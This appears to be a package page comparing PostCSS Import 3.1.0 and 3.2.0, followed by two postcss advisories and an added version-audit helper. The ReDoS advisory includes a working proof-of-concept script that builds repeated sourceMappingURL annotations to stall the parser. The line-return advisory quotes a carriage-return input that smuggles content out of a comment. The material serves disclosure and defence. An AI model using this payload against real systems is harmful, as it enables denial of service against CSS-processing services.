PostCSS Import is a valuable tool for developers seeking to streamline CSS management by enabling the modularization of stylesheets. Versions 3.1.0 and 3.2.0 share a common goal: simplifying the import of CSS files into PostCSS workflows. Underneath, both versions rely on the same core dependencies: clone, postcss, resolve, and postcss-message-helpers, ensuring consistent functionality for cloning objects, processing CSS with PostCSS, resolving file paths, and providing helpful messages. The development dependencies also remain consistent, with jscs, tape, jshint, and css-whitespace being used for code style checks, testing, linting, and whitespace analysis, respectively.
The notable difference between the two versions lies in their release dates. Version 3.1.0 came out on November 25, 2014, while version 3.2.0 was released shortly after on November 27, 2014. Although the core dependencies and development tools stayed the same, this quick release suggests that version 3.2.0 likely contained bug fixes or minor refinements addressing issues identified in the earlier 3.1.0 release. While the specific changes aren't detailed in the provided data, developers using PostCSS Import should opt for version 3.2.0 to benefit from any improvements and ensure a potentially more stable and reliable experience. Both versions are licensed under MIT.
All known vulnerabilities affecting version 3.2.0 of the package (both are in its postcss dependency)
Regular Expression Denial of Service in postcss
Versions of the package postcss before 7.0.36, or between 8.0.0 and 8.2.13, are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
```javascript
var postcss = require("postcss");

// Builds a stylesheet followed by n repeated source-map annotation openers
// and a trailing "!" so that the annotation never closes; this is the input
// shape that makes the previous-map regex backtrack.
function build_attack(n) {
  var ret = "a{}";
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL=";
  }
  return ret + "!";
}

// Warm-up parse of a normal, well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */');

// Measure how parse time grows with input length, in steps of 1000 repeats.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i);
    try {
      postcss.parse(attack_str);
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
```
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
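The following is an added example, not part of the advisory text or the postcss project: a small audit helper that checks an installed postcss version against the affected ranges stated in the two advisories above, and flags untrusted CSS input that has the two shapes those advisories describe (a bare carriage return, and many repeated sourceMappingURL annotations). The function names and the annotation threshold are assumptions.

```javascript
// Added example, not from the advisories or from postcss. Version ranges are
// those stated in the two advisories above; the helper names and the
// annotation-count threshold are assumptions for illustration.

// Parse "major.minor.patch" (any pre-release suffix is ignored) into numbers.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return m.slice(1, 4).map(Number);
}

// Returns -1, 0 or 1 comparing two version strings component-wise.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}
const lt = (a, b) => compareVersions(a, b) < 0;
const gte = (a, b) => compareVersions(a, b) >= 0;

// Affected ranges exactly as stated in the two advisories above.
const ADVISORIES = [
  { title: 'Regular Expression Denial of Service in postcss',
    affected: v => lt(v, '7.0.36') || (gte(v, '8.0.0') && lt(v, '8.2.14')) },
  { title: 'PostCSS line return parsing error',
    affected: v => lt(v, '8.4.31') },
];

// Titles of the advisories that apply to the given postcss version.
function affectedAdvisories(version) {
  return ADVISORIES.filter(a => a.affected(version)).map(a => a.title);
}

// Heuristic pre-parse checks on untrusted CSS: a bare carriage return is the
// trigger for the line-return bug, and many sourceMappingURL annotations is
// the shape of the ReDoS input (a normal stylesheet carries at most one).
function suspiciousCssInput(css, maxAnnotations = 1) {
  const findings = [];
  if (/\r/.test(css)) findings.push('contains carriage return (\\r)');
  const annotations = (css.match(/\/\*\s*#?\s*sourceMappingURL=/g) || []).length;
  if (annotations > maxAnnotations) findings.push(`${annotations} sourceMappingURL annotations`);
  return findings;
}
```

To check a project's resolved dependency, pass the installed version, for example the output of `node -p "require('postcss/package.json').version"`, to affectedAdvisories.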